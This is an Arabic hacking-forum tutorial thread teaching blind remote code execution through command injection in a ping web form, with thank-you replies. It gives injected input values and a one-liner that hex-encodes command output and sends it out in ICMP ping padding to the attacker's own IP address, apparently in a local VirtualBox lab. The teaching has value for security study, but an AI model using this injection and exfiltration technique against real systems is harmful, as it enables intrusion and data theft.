1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

ثغرات Blind Remote Code Execution

الموضوع في 'المواضيع المُكرّرة والمُخالفة' بواسطة Dr.Azoz, بتاريخ ‏30 ديسمبر 2014.

كاتب الموضوع : Dr.Azoz المشاهدات : 563 الردود : 8 ‏30 ديسمبر 2014
حالة الموضوع:
مغلق
  1. غير متصل

    Dr.Azoz
    rankrank
    Developer

    عضو منذ:
    ‏27 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    [​IMG]

    السلام عليكم ورحمة وبركاته

    اللهم صل وسلم على سيدنا محمد وعلى آله وصحبة اجمعين

    اللهم لا علم لنا الا ماعلمتنا انك انت العليم الحكيم
    [​IMG]
    اليوم راح اتكلم عن

    Blind Remote Code Execution


    النوع هذا من الثغرات شبيه بثغرات Remote Code Execution والاختلاف الوحيد بان الناتج لا يعرض على الصفحة

    ولو فرضنا عندنا موقع بالشكل التالي

    [​IMG]


    الموقع يقوم بعمل ping للاي ابي اللي تكتبه وفيه ثغرة RCE ولكن للاسف المخرجات ماهي باينة

    في الحالة هذي لابد لنا من التنصت على المودم وعمل بنق لجهازنا عشان نعرف اذا الثغرة موجودة او لا

    نشوف

    اول مانقوم به هو عملية التنصت

    كود PHP:
    tcpdump -i vboxnet0 -n icmp
    الاداة tcpdump تقوم بالتنصت على البيانات المرسلة والمستقبل على المودم vboxnet0 واستخدمنا n- عشان مايتم تحويل العنواين الى اسماء وبالاخير اخترنا البروتوكول icmp اللي يستخدمه الامر ping

    الان بعد ماشغلنا التنصت وصار جاهز نرجع نسوي بنق للاي بي تبعنا ونشوف النتيجة

    الامر المستخدم هو

    كود PHP:
    addr=127.0.0.1ping -c 4 192.168.56.1
    والنتيجة على tcpdump

    [​IMG]

    طبعا الخيار c- في الامر ping يحدد لنا عدد مرات البنق وهنا اخترنا 4 مرات

    الان تاكدنا من ان الموقع مصاب بثغرة Blind Remote Code Execution

    طيب الان ناخذ الاستغلال للخطوة الثانية

    الان بما ان الموقع مانقدر نسوي منه شي الا عن طريق البروتوكول icmp لابد لنا من استخدام


    الامر ping لانه هو الوحيد اللي يستخدم البروتوكول هذا

    الان هدفنا هو تمرير الامر خلال البروتوكول icmp للامر ping

    الان لو نقرا المانويل تبع البينق man ping راح نجي للخيار p- اللي ينص على التالي

    [PHP CODE] -p pattern
    You may specify up to 16 ’’pad’’ bytes to fill out the packet you send. This is useful for
    diagnosing data-dependent problems in a network. For example, -p ff will cause the sent packet to be
    filled with all ones.[/PHP CODE]

    عني بالامكان تغذية البينق بالخيار هذا بالبايتات اللي نبيها والشرط انها تكون 16 بايت كحد اقصى

    يعني لو قدرنا نحول مخرجات الامر اللي نبيه الى هيكس وبعدها نغذيها للامر ping نقدر نستخلص الناتج

    فيه اداة في لينكس اسمها xxd تقوم بالتحويل من الهكس والعكس

    نشوف ناتج الامر النهائي

    [PHP CODE] addr=127.0.0.1; hex=$(ls -l | xxd -ps -c 16); for word in $hex; do ping 192.168.127.101 -c 1 -s 32 -p
    $word; done[/PHP CODE]

    الان الامر اللي نبيه هو ls -l مثل ماهو واضح وحطيته بين قوسين ليكون متغير بعدين خليته يمر على الامر xxd

    واستخدمت الخيارين الاول ps- وهو لتحويله الى هكس خالص بعدين حطيته على 16 وهو العواميد c- عشان مثل ماقلنا الخيار p- في بينق اكثر مايرسل 16 بايت والامر هذا يعطي سطر جديد بعد كل سطر من 16 بايت

    بعدين لوب بسيط باللينكس يخلينا نرسل كل 16 بايت لحالها

    نشوف النتيجة النهائية

    [​IMG]


    استخدمت الامر

    كود PHP:
    tcpdump -i vboxnet0 -n icmp --/tmp/packet.pac
    لاضافة كانت X- عشان نشوف محتوى الباكج و w- عشان نصدر الملف

    الان نفتح الملف ونشوف وش الناتج


    [​IMG]

    وهذي هي النتيجة علما بان الصفحة debug.php هي الصفحة اللي فيها الثغرة

    يعني الطريقة كفيلة باستخراج المعلومات وتطبيق الاوامر
    [​IMG]
    الى هنا ينتهي الدرس

    ان اخطات فمن نفسي والشيطان وان اصبت فمن الله وحده

    لا تنسوني من دعائكم :ُeُiy:
     


    جاري تحميل الصفحة...
  2. غير متصل

    V!rus-MarOc
    rankrank
    Developer

    عضو منذ:
    ‏26 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    الوظيفة:
    Hacker
    الإقامة:

    رد: ثغرات Blind Remote Code Execution

    يعطيك الف الف عافية
     


  3. غير متصل

    R0CKO
    rank
    Developer

    عضو منذ:
    ‏8 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: ثغرات Blind Remote Code Execution

    بارك الله فيك على هذا الطرح
     


  4. غير متصل

    M3N X
    Developer

    عضو منذ:
    ‏16 يوليو 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:

    رد: ثغرات Blind Remote Code Execution

    يعطيك العافيـة يامبدع

    مجهود كبير ، تسلم ايدك
     


  5. غير متصل

    ĸʜɜʟɛɒ
    Active DeveloPer

    عضو منذ:
    ‏3 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    رد: ثغرات Blind Remote Code Execution

    جزاك لله خيرا أخي
    واصل و لاتحرمن من جديدك
     


  6. غير متصل

    Injection
    rank
    Developer

    عضو منذ:
    ‏28 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الوظيفة:
    *******
    الإقامة:

    رد: ثغرات Blind Remote Code Execution

    وعليكم السلام ورحمه الله وبركاته

    يعطيك الف عافيه يا حبيبي
     


  7. غير متصل

    coiffa
    rank
    Developer

    عضو منذ:
    ‏1 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: ثغرات Blind Remote Code Execution

    مجهود كبير وقمة في الابداع بارك الله فيك
     


  8. غير متصل

    لـ حظة غ ـيآبك
    rankrank
    Developer

    عضو منذ:
    ‏28 فبراير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: ثغرات Blind Remote Code Execution

    يعطيك العافيه آخي ..

    بـآرك آلله فيك
     


  9. غير متصل

    LIATH ALMAHDAWI
    rankrank
    Developer

    عضو منذ:
    ‏12 فبراير 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: ثغرات Blind Remote Code Execution

    سلمت الايادي حبيبي قلبي ^_^
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...